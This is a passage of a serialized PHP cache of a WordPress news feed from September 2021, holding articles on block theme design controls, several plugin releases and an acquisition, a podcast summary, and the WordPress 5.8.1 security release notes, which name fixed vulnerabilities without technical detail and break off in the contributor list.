alignment&rdquo; means for instance.</p><cite><a href=\"https://github.com/WordPress/gutenberg/pull/33812#issuecomment-910385740\">Riad Benguella</a></cite></blockquote>\n\n\n\n<p>If such a stance becomes one of the cornerstones of block theme development, it will turn many traditional themers away.</p>\n\n\n\n<p>I agree with the principle that this should be the foundation, the default way that theming works in WordPress going forward. The more pieces that we can standardize, the better. But, as a rule of thumb, theme authors should be able to opt out of any design-related feature.  Then, we make rare exceptions to that rule when the need arises.</p>\n\n\n\n<p>Regardless of what Gutenberg and, ultimately, WordPress does, theme authors will find a way around it. Let us pretend that &ldquo;horizontal alignment&rdquo; is defined by CSS flexbox in core. I guarantee that someone will come along and use CSS grid.</p>\n\n\n\n<p>In the case of the &ldquo;block gap&rdquo; feature introduced in Gutenberg 11.4, it is essentially a fancy name for a global top margin that gets applied to blocks (not to be confused with the actual CSS <code>gap</code> property). In essence, it is a system for defining part of the default vertical rhythm.</p>\n\n\n\n<p>This feature has long been on my wish list, but the idea of mandating it never crossed my mind. If you want to see a heated discussion, throw a handful of web designers in a room and have them discuss the myriad ways of handling vertical spacing between elements. <em>I am in the top margin camp.</em></p>\n\n\n\n<p>Fortunately, theme authors will be able to <a href=\"https://github.com/WordPress/gutenberg/pull/34491\">enable or disable the block gap feature</a>. But, that is merely one battle.</p>\n\n\n\n<p>I had planned to reply in-ticket, but I did not want to get too far off-topic. I also wanted to give some consideration to <em>the other side</em>. However, I could think of few instances where WordPress should always be the deciding factor on front-end design.</p>\n\n\n\n<p>From that position, I envision little more than theme authors creating workarounds for what they will see as a broken system. There is nothing wrong with WordPress defining the defaults. However, it should always be from the mindset that developers will want to venture out. The best way to keep them happy is to not get in the way. Build a system that they <em>want</em> to use, not that they <em>must</em> use. And, for those who decide to go a different route, make it easy. Even if we think those rebel designers are creating a broken user experience, that is OK. It is their project to make or break.</p>\n\n\n\n<p>What makes WordPress so uniquely WordPress is that the platform has always catered to those who want to extend it in just about any imaginable way. If it starts creating stumbling blocks that need not be there, we have done a poor job as stewards of the software.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 11 Sep 2021 01:13:12 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:19;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:86:\"WPTavern: Pipe Wrench Publication Releases New Native Land Search Plugin for WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=122573\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:217:\"https://wptavern.com/pipe-wrench-publication-releases-new-native-land-search-plugin-for-wordpress?utm_source=rss&utm_medium=rss&utm_campaign=pipe-wrench-publication-releases-new-native-land-search-plugin-for-wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2976:\"<p><a href=\"https://pipewrenchmag.com/\">Pipe Wrench</a>, an online publication that dissects different topics through longform stories, reactions, interpretations, and asides, has <a href=\"https://pipewrenchmag.com/2021/09/07/native-land-search-free-wordpress-plugin/\">released</a> a free WordPress plugin called <a href=\"https://wordpress.org/plugins/native-lands-search/\">Native Land Search</a>. The publication commissioned the plugin from <a href=\"https://alexjgustafson.blog/2021/08/18/native-land-search-for-pipe-wrench/\">Alex Gustafson</a>, a subscriber and contributor to the magazine.</p>\n\n\n\n<p>Native Land Search offers a search block or &ldquo;Native Lands Aside&rdquo; block pattern that users can add to the post content. Site visitors can search an address to discover if it is on indigenous lands.</p>\n\n\n\n<img />Pipe Wrench implementation of the Native Land Search block\n\n\n\n<p>On the Pipe Wrench publication, the content authors have added a Cover block with a background image and put the search block inside the Group block.</p>\n\n\n\n<p>Here is an example of the output for a Florida location: </p>\n\n\n\n<img />\n\n\n\n<p>The search results are powered by the&nbsp;<a href=\"https://native-land.ca/resources/api-docs/\">native-land.ca API</a>&nbsp;and&nbsp;<a href=\"https://developers.google.com/maps/documentation/geocoding/overview\">Google Geocoding API</a>. Native Land Digital, a non-profit organization, created the maps with the following mission: </p>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>We strive to map Indigenous lands in a way that changes, challenges, and improves the way people see the history of their countries and peoples. We hope to strengthen the spiritual bonds that people have with the land, its people, and its meaning.</p><p>We strive to map Indigenous territories, treaties, and languages across the world in a way that goes beyond colonial ways of thinking in order to better represent how Indigenous people want to see themselves.</p></blockquote>\n\n\n\n<p>Native Land Digital notes that the maps do not represent or intend to represent official or legal boundaries of any indigenous nations.</p>\n\n\n\n<p>&ldquo;All kinds of sites &mdash; magazine, newspaper, personal blog, academic hub, nonprofit &mdash; can use the block to add depth to all kinds of content involving Indigenous groups,&rdquo; Pipe Wrench Editor Michelle Weber said. &ldquo;LandBack, residential schools, climate change, general history &mdash; offering this search tool helps non-indigenous folks uncover and understand vital histories with ongoing ramifications.&rdquo;</p>\n\n\n\n<p>The Native Land Search Plugin is available for <a href=\"https://wordpress.org/plugins/native-lands-search/\">download from WordPress.org</a> and contributions can be submitted on <a href=\"https://github.com/alexjgustafson/native-lands\">GitHub</a>. It may never have a million active installs but the plugin could be an important tool for sites involved in education or advocacy efforts.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 11 Sep 2021 00:58:55 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:20;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:91:\"Post Status: Post Status Excerpt (No. 24) — Entrepreneurial Resilience: Relying On Others\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"https://poststatus.com/?p=86195\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://poststatus.com/excerpt/24/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3524:\"<h2 id=\"h-a-crisis-can-either-build-you-or-break-you\">&#8220;A crisis can either build you or break you.&#8221;</h2>\n\n\n\n<p class=\"has-drop-cap\">In this episode of Post Status Excerpt, David and Cory reflect on a tough question: What can help WordPress professionals weather the storm of being an entrepreneur in challenging times?  Cory shares four types of people who can offer support in their own unique ways: spouses, counselors, coaches, and colleagues. It\'s important that you find the right combination of people and connections that works best for you.</p>\n\n\n\n<p><strong>Also covered in this episode: </strong>Cory and David thank their spouses and will later share the timestamps of this podcast with them as evidence.</p>\n\n\n\n\n\n\n\n<p class=\"has-background\">Every week Post Status Excerpt will brief you on important WordPress news — in about 15 minutes or less! Learn what\'s new in WordPress in a flash. <img src=\"https://s.w.org/images/core/emoji/13.0.1/72x72/26a1.png\" alt=\"⚡\" class=\"wp-smiley\" /><br /><br /><a href=\"https://poststatus.com/category/post-status-podcasts/\">Browse our archives</a>, and don’t forget to subscribe to our podcasts on <a href=\"https://open.spotify.com/show/1m3xwXbe0MG5BzFVPtB0A7\">Spotify</a>, Amazon Music, <a href=\"https://podcasts.google.com/feed/aHR0cHM6Ly9mZWVkcy5zaW1wbGVjYXN0LmNvbS8ySkU5c2M4UA\">Google Podcasts</a>, <a href=\"https://itunes.apple.com/us/podcast/post-status-draft-wordpress/id976403008\">iTunes</a>, <a href=\"https://castro.fm/podcast/c53552c6-1ee0-4fc4-9de4-08ed6bf1ee4d\">Castro</a>, <a href=\"https://www.youtube.com/c/PostStatus\">YouTube</a>, <a href=\"http://www.stitcher.com/podcast/krogsgard/post-status-draft-wordpress-podcast\">Stitcher</a>, <a href=\"https://player.fm/series/wordpress-post-status-podcasts\">Player.fm</a>, <a href=\"https://pca.st/05rR\">Pocket Casts</a>, <a href=\"https://wordpress-post-status-draft-podcast.simplecast.com/\">Simplecast</a>, or by <a href=\"https://feeds.simplecast.com/2JE9sc8P\">RSS</a>. <img src=\"https://s.w.org/images/core/emoji/13.0.1/72x72/1f3a7.png\" alt=\"?\" class=\"wp-smiley\" /></p>\n\n\n\n<h3 id=\"h-mentioned-in-the-show\"><img src=\"https://s.w.org/images/core/emoji/13.0.1/72x72/1f517.png\" alt=\"?\" class=\"wp-smiley\" /> Mentioned in the show:</h3>\n\n\n\n<ul><li><a href=\"https://wordpress.tv/2018/12/22/cory-miller-entrepreneurial-resilience-handling-the-toughest-times-in-business-and-surviving/\"></a><a href=\"https://wordpress.tv/event/wordcamp-sacramento-2017/\">WordCamp Sacramento 2017</a> &#8211; Cory Miller On &#8220;Entrepreneurial Resilience&#8221;</li><li><a href=\"https://twitter.com/dimensionmedia\" target=\"_blank\" rel=\"noreferrer noopener\">David Bisset (Twitter)</a></li><li><a href=\"https://twitter.com/corymiller303\" target=\"_blank\" rel=\"noreferrer noopener\">Cory Miller (Twitter)</a></li><li><a href=\"https://twitter.com/post_status\" target=\"_blank\" rel=\"noreferrer noopener\">Post Status (Twitter)</a></li></ul>\n\n\n\n<h3><img src=\"https://s.w.org/images/core/emoji/13.0.1/72x72/1f64f.png\" alt=\"?\" class=\"wp-smiley\" /> Sponsor: <a href=\"https://poststat.us/sandhills\" target=\"_blank\" rel=\"noreferrer noopener sponsored nofollow\">SpinupWP</a></h3>\n\n\n\n<p>Spin up your own extremely fast WordPress server in minutes with <strong>SpinupWP</strong>. Use any cloud hosting provider you want, and manage your servers remotely with a simple but powerful control panel. Get the security and performance of managed hosting without losing the independence of hosting your projects and your clients yourself.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 10 Sep 2021 03:27:07 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"David Bisset\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:21;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"WPTavern: Add a Little Pumpkin Spice to Your WordPress Admin This Autumn\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=122545\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:189:\"https://wptavern.com/add-a-little-pumpkin-spice-to-your-wordpress-admin-this-autumn?utm_source=rss&utm_medium=rss&utm_campaign=add-a-little-pumpkin-spice-to-your-wordpress-admin-this-autumn\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3473:\"<p class=\"has-drop-cap\">Autumn is my favorite time of the year. On some weekends, I like to drive through my old hometown with the windows rolled down. I crawl through the school zone at 25 mph and breathe in the football field&rsquo;s freshly cut grass. All those memories of blood, guts, and glory under the Friday night lights flood back. Nervous homecoming dances. Hayrides next to the girl who actually agreed to accompany me for the evening. It is a time of festivals, candied apples, and the lingering heat of an Alabama summer that refuses to fade away.</p>\n\n\n\n<p>It was always a time of magic and memories, and now it is also the season for pumpkin spice lattes. With a couple of short weeks left before autumn hits, stores and shops are already gearing up for it.</p>\n\n\n\n<p>Love it or hate it, nearly everything has a pumpkin spice flavor now &mdash; even the WordPress admin interface.</p>\n\n\n\n<p>Ben Byrne, the co-founder of <a href=\"https://cornershopcreative.com/\">Cornershop Creative</a>, released <a href=\"https://wordpress.org/plugins/pumpkin-spice-admin/\">Pumpkin Spice Admin</a> in the past week. It is a WordPress plugin that brings the sights of the autumn season front and center.</p>\n\n\n\n<img />Dashboard screen when using Pumpkin Spice Admin.\n\n\n\n<p>Never let it be said that I am not a fan of the more whimsical WordPress plugins. One of the joys in my life is seeing these creative attempts at throwing a bit of fun into this thing we call the world wide web. Far too often, we focus so much on business deals and technical features that we sometimes forget to stop and enjoy something as beautiful as autumn leaves changing colors.</p>\n\n\n\n<p>Even if we are not simply running a personal blog, it never hurts to install a fun admin-side theme for our own amusement, unbeknownst to our visitors. Just a little something to brighten our day when we cannot be out and enjoying nature.</p>\n\n\n\n<p>The biggest downside to the plugin is that it does not rely on the standard WordPress <a href=\"https://developer.wordpress.org/reference/functions/wp_admin_css_color/\">admin color scheme system</a>, which allows each user to select their preferred style. For solo site owners, this is a non-issue. For multi-author websites, it could be problematic if everyone is not on board with the change. I would even consider using it here at WP Tavern, but it might come as a bit of a shock to the rest of the team when they log in.</p>\n\n\n\n<p>Technically, it is more than a color scheme. It adds a custom font and a falling leaves animation on each admin screen. However, it would be easy to tie those to user preferences.</p>\n\n\n\n<p>At first, I was somewhat off-put by the leaves falling down on the post-editing screen. It could be an annoyance for some users, but the few that appear, quickly pile at the bottom of the browser window. It is not a continuous animation.</p>\n\n\n\n<img />Falling leaves on the post-editing screen.\n\n\n\n<p>The plugin&rsquo;s font also overrules the post title, but I can live with that. In some ways, I actually prefer it. It does not affect other fonts in the editor.</p>\n\n\n\n<p>Pumpkin Spice Admin will automatically stop working after the season is over. It sets itself to run only from September through November, so there are no worries if you forget to deactivate it.</p>\n\n\n\n<p>I only have the plugin running in my test environment, but I am enjoying it for now. All that is missing is a pumpkin-style cursor to complete the look.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 10 Sep 2021 01:05:21 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:22;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:93:\"WPTavern: Automattic Acquires Social Image Generator Plugin, Plans to Integrate with Jetpack\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=122474\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:227:\"https://wptavern.com/automattic-acquires-social-image-generator-plugin-plans-to-integrate-with-jetpack?utm_source=rss&utm_medium=rss&utm_campaign=automattic-acquires-social-image-generator-plugin-plans-to-integrate-with-jetpack\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3861:\"<div class=\"wp-block-image\"><img /></div>\n\n\n\n<p>Automattic has <a href=\"https://jetpack.com/2021/09/08/jetpack-acquires-wordpress-plugin-social-image-generator/\">acquired the Social Image Generator plugin</a>, a commercial product that automatically creates social share images for WordPress content from a set of fully customizable templates. The plugin launched in February 2021, with a starting price of <a href=\"https://socialimagegenerator.com/#pricing\">$39/year</a> but is now closed to new sales. Daniel Post, the plugin&rsquo;s creator, is joining Automattic to continue developing it as a new addition to Jetpack&rsquo;s&nbsp;<a href=\"https://jetpack.com/features/growth/automatic-publishing/\">social media tools</a>. </p>\n\n\n\n<p>Automattic is always on the prowl for companies that are doing something interesting in the WordPress ecosystem. The <a href=\"https://socialimagegenerator.com/\">Social Image Generator plugin</a> expertly captured a new niche with an interface that feels like a natural part of WordPress and impressed our chief plugin critic, Justin Tadlock, in a recent <a href=\"https://wptavern.com/create-per-post-social-media-images-with-the-social-image-generator-wordpress-plugin\">review</a>.</p>\n\n\n\n<p>&ldquo;Automattic approached me and let me know they were fans of my plugin,&rdquo; Post said. &ldquo;And then we started talking to see what it would be like to work together. We were actually introduced by Chris Coyier from CSS-Tricks, who uses both our products.&rdquo;</p>\n\n\n\n<p>The Social Image Generator plugin has always been a commercial-only product, which tends to limit a plugin&rsquo;s reach within a market that has been so heavily trained on the freemium model. Its acquisition will undoubtedly get it into the hands of more WordPress users.</p>\n\n\n\n<p>&ldquo;I briefly considered building a freemium plugin but I decided to focus on paid licenses to make sure I could provide great support to all users and, frankly, to see how well it would be received compared to a freemium plugin,&rdquo; Post said.</p>\n\n\n\n<p>Current customers will be able to continue using the plugin &ldquo;without any changes in the near term,&rdquo; according to the announcement on the Jetpack blog. Those who have strong opinions about the long-term future of the plugin are encouraged to schedule a session with <a href=\"https://jetpackresearch.blog/\">Jetpack Customer Research</a> to open a dialogue.</p>\n\n\n\n<p>&ldquo;I look forward to the future functionality and user experience improvements that will come out of this acquisition,&rdquo; Jetpack General Manager James Grierson said. &ldquo;The goal of our social product is to help content creators expand their audience through increased distribution and engagement. Social Image Generator will be a key component of helping us deliver this to our customers.&ldquo;</p>\n\n\n\n<p>I would not be surprised to see this plugin available on one of Jetpack&rsquo;s paid tiers in the near future, alongside the Publicize module&rsquo;s other paid features (scheduling social media posts, tracking and viewing sharing history, and re-sharing existing content). Social Image Generator makes WordPress content more engaging on social media, has built-in support for WooCommerce, and can be extended for use with other plugins. It&rsquo;s a strategic acquisition where Automattic gains an engineer as well as a new way to make Jetpack subscriptions more compelling. </p>\n\n\n\n<p>&ldquo;We are still figuring out our exact approach, but the initial plans are to integrate the Social Image Generator features with the existing Jetpack social tools like Publicize,&rdquo; Post said. &ldquo;The ability to see exactly what your social media post will look like before publishing it right from your WordPress site is incredible, and a big reason why I&rsquo;m so excited about this acquisition.&rdquo;</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 09 Sep 2021 04:00:43 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:23;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"WordPress.org blog: WordPress 5.8.1 Security and Maintenance Release\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=11190\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:84:\"https://wordpress.org/news/2021/09/wordpress-5-8-1-security-and-maintenance-release/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:8826:\"<p>WordPress 5.8.1 is now available!</p>\n\n\n\n<p>This security and maintenance release features <a href=\"https://core.trac.wordpress.org/query?milestone=5.8.1&group=component&col=id&col=summary&col=milestone&col=owner&col=type&col=status&col=priority&order=priority\">60 bug</a> <a href=\"https://github.com/WordPress/gutenberg/pull/34393\">fixes</a> in addition to 3 security fixes. Because this is a <strong>security release</strong>, it is recommended that you update your sites immediately. All versions since WordPress 5.4 have also been updated.</p>\n\n\n\n<p>WordPress 5.8.1 is a short-cycle security and maintenance release. The next major release will be version <a href=\"https://make.wordpress.org/core/5-9/\">5.9</a>.</p>\n\n\n\n<p>You can download WordPress 5.8.1 by downloading from WordPress.org, or visit your Dashboard → Updates and click Update Now.</p>\n\n\n\n<p>If you have sites that support automatic background updates, they’ve already started the update process.</p>\n\n\n\n<h3><strong>Security Updates</strong></h3>\n\n\n\n<p>3 security issues affect WordPress versions between 5.4 and 5.8. If you haven’t yet updated to 5.8, all WordPress versions since 5.4 have also been updated to fix the following security issues:</p>\n\n\n\n<ul><li>Props <a href=\"https://profiles.wordpress.org/mdawaffe/\" class=\"mention\"><span class=\"mentions-prefix\">@</span>mdawaffe</a>, member of the WordPress Security Team for their work fixing a data exposure vulnerability within the REST API.</li><li>Props to Michał Bentkowski of Securitum for reporting a XSS vulnerability in the block editor.</li><li>The Lodash library has been updated to version 4.17.21 in each branch to incorporate upstream security fixes.</li></ul>\n\n\n\n<p>In addition to these issues, the security team would like to thank the following people for reporting vulnerabilities during the WordPress 5.8 beta testing period, allowing them to be fixed prior to release:</p>\n\n\n\n<ul><li>Props <a rel=\"noreferrer noopener\" target=\"_blank\" href=\"https://evanricafort.com/\">Evan Ricafort</a>&nbsp;for reporting a XSS vulnerability in the block editor discovered during the 5.8 release’s beta period.</li><li>Props <a rel=\"noreferrer noopener\" target=\"_blank\" href=\"https://profiles.wordpress.org/stevehenty/\">Steve Henty</a>&nbsp;for reporting a privilege escalation issue in the block editor.</li></ul>\n\n\n\n<p>Thank you to all of the reporters for <a href=\"https://make.wordpress.org/core/handbook/testing/reporting-security-vulnerabilities/\">privately disclosing the vulnerabilities</a>. This gave the WordPress security team time to fix the vulnerabilities before WordPress sites could be attacked.</p>\n\n\n\n<p>For more information, browse the <a href=\"https://core.trac.wordpress.org/query?milestone=5.8.1&group=component&col=id&col=summary&col=milestone&col=owner&col=type&col=status&col=priority&order=priority\">full list of changes</a> on Trac, or check out the <a href=\"https://wordpress.org/support/wordpress-version/version-5-8-1/\">version 5.8.1 HelpHub documentation page</a>.</p>\n\n\n\n<h2>Thanks and props!</h2>\n\n\n\n<p>The 5.8.1 release was led by <a href=\"https://profiles.wordpress.org/desrosj/\">Jonathan Desrosiers</a> and <a href=\"https://profiles.wordpress.org/circlecube/\">Evan Mullins</a>.</p>\n\n\n\n<p>In addition to the security researchers and release squad members mentioned above, thank you to everyone who helped make WordPress 5.8.1 happen:</p>\n\n\n\n<a href=\"https://profiles.wordpress.org/2linctools/\">2linctools</a>, <a href=\"https://profiles.wordpress.org/zieladam/\">Adam Zielinski</a>, <a href=\"https://profiles.wordpress.org/schlessera/\">Alain Schlesser</a>, <a href=\"https://profiles.wordpress.org/ajlende/\">Alex Lende</a>, <a href=\"https://profiles.wordpress.org/alexstine/\">alexstine</a>, <a href=\"https://profiles.wordpress.org/algala/\">AlGala</a>, <a href=\"https://profiles.wordpress.org/oandregal/\">André</a>, <a href=\"https://profiles.wordpress.org/andraganescu/\">Andrei Draganescu</a>, <a href=\"https://profiles.wordpress.org/azaozz/\">Andrew Ozz</a>, <a href=\"https://profiles.wordpress.org/ankitmaru/\">Ankit Panchal</a>, <a href=\"https://profiles.wordpress.org/antpb/\">Anthony Burchell</a>, <a href=\"https://profiles.wordpress.org/antonvlasenko/\">Anton Vlasenko</a>, <a href=\"https://profiles.wordpress.org/aristath/\">Ari Stathopoulos</a>, <a href=\"https://profiles.wordpress.org/ribaricplusplus/\">Bruno Ribaric</a>, <a href=\"https://profiles.wordpress.org/poena/\">Carolina Nymark</a>, <a href=\"https://profiles.wordpress.org/daisyo/\">Daisy Olsen</a>, <a href=\"https://profiles.wordpress.org/talldanwp/\">Daniel Richards</a>, <a href=\"https://profiles.wordpress.org/dariak/\">Daria</a>, <a href=\"https://profiles.wordpress.org/davidanderson/\">David Anderson</a>, <a href=\"https://profiles.wordpress.org/davidbinda/\">David Biňovec</a>, <a href=\"https://profiles.wordpress.org/dlh/\">David Herrera</a>, <a href=\"https://profiles.wordpress.org/ocean90/\">Dominik Schilling</a>, <a href=\"https://profiles.wordpress.org/ellatrix/\">Ella van&nbsp;Durpe</a>, <a href=\"https://profiles.wordpress.org/enchiridion/\">Enchiridion</a>, <a href=\"https://profiles.wordpress.org/circlecube/\">Evan Mullins</a>, <a href=\"https://profiles.wordpress.org/garyj/\">Gary Jones</a>, <a href=\"https://profiles.wordpress.org/mamaduka/\">George Mamadashvili</a>, <a href=\"https://profiles.wordpress.org/gziolo/\">Greg Ziółkowski</a>, <a href=\"https://profiles.wordpress.org/priethor/\">Héctor Prieto</a>, <a href=\"https://profiles.wordpress.org/ianmjones/\">ianmjones</a>, <a href=\"https://profiles.wordpress.org/audrasjb/\">Jb Audras</a>, <a href=\"https://profiles.wordpress.org/jblz/\">Jeff Bowen</a>, <a href=\"https://profiles.wordpress.org/joedolson/\">Joe Dolson</a>, <a href=\"https://profiles.wordpress.org/joen/\">Joen A.</a>, <a href=\"https://profiles.wordpress.org/johnbillion/\">John Blackbourn</a>, <a href=\"https://profiles.wordpress.org/desrosj/\">Jonathan Desrosiers</a>, <a href=\"https://profiles.wordpress.org/juanmaguitar/\">JuanMa Garrido</a>, <a href=\"https://profiles.wordpress.org/jrf/\">Juliette Reinders Folmer</a>, <a href=\"https://profiles.wordpress.org/kevin940726/\">Kai Hao</a>, <a href=\"https://profiles.wordpress.org/kapilpaul/\">Kapil Paul</a>, <a href=\"https://profiles.wordpress.org/gwwar/\">Kerry Liu</a>, <a href=\"https://profiles.wordpress.org/kevinfodness/\">Kevin Fodness</a>, 